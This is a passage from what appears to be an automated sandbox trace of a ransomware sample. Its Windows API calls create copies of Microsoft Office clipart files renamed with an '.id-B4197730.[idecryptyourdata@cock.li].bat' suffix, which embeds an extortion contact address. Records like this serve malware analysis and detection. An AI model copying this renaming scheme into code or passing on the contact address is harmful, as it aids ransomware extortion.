lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.850] CloseHandle (hObject=0x50c) returned 1 [0162.852] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.852] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152716.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152716.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.853] CloseHandle (hObject=0x50c) returned 1 [0162.854] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.854] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152722.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152722.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.855] CloseHandle (hObject=0x50c) returned 1 [0162.856] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.856] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152876.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152876.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.857] CloseHandle (hObject=0x50c) returned 1 [0163.175] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.175] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152878.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152878.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.176] CloseHandle (hObject=0x514) returned 1 [0163.177] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.177] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.178] CloseHandle (hObject=0x514) returned 1 [0163.178] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.178] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157177.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157177.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.217] CloseHandle (hObject=0x514) returned 1 [0163.218] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.218] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157191.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157191.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.218] CloseHandle (hObject=0x514) returned 1 [0163.220] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.220] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.220] CloseHandle (hObject=0x514) returned 1 [0163.221] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.221] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.221] CloseHandle (hObject=0x514) returned 1 [0163.223] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.223] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.223] CloseHandle (hObject=0x514) returned 1 [0163.224] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.224] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.224] CloseHandle (hObject=0x514) returned 1 [0163.226] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.226] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.227] CloseHandle (hObject=0x514) returned 1 [0163.229] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.229] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.229] CloseHandle (hObject=0x514) returned 1 [0163.236] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.236] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.237] CloseHandle (hObject=0x514) returned 1 [0163.492] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.493] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.493] CloseHandle (hObject=0x530) returned 1 [0163.494] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.495] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.495] CloseHandle (hObject=0x530) returned 1 [0163.496] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.496] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.496] CloseHandle (hObject=0x530) returned 1 [0163.499] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.499] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.499] CloseHandle (hObject=0x51c) returned 1 [0163.499] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.499] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.500] CloseHandle (hObject=0x51c) returned 1 [0163.500] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.500] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.501] CloseHandle (hObject=0x51c) returned 1 [0163.504] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.504] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.504] CloseHandle (hObject=0x530) returned 1 [0163.507] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.507] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.507] CloseHandle (hObject=0x51c) returned 1 [0163.508] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.508] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.509] CloseHandle (hObject=0x51c) returned 1 [0163.514] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.514] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.515] CloseHandle (hObject=0x530) returned 1 [0163.516] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.516] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.516] CloseHandle (hObject=0x530) returned 1 [0163.517] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.517] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185774.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185774.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.517] CloseHandle (hObject=0x530) returned 1 [0163.518] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.518] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185776.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185776.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.518] CloseHandle (hObject=0x530) returned 1 [0163.519] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.519] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185778.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185778.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.519] CloseHandle (hObject=0x530) returned 1 [0163.521] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.521] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.521] CloseHandle (hObject=0x530) returned 1 [0163.522] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.522] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.522] CloseHandle (hObject=0x530) returned 1 [0163.761] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.761] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.762] CloseHandle (hObject=0x51c) returned 1 [0165.562] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.562] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0165.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 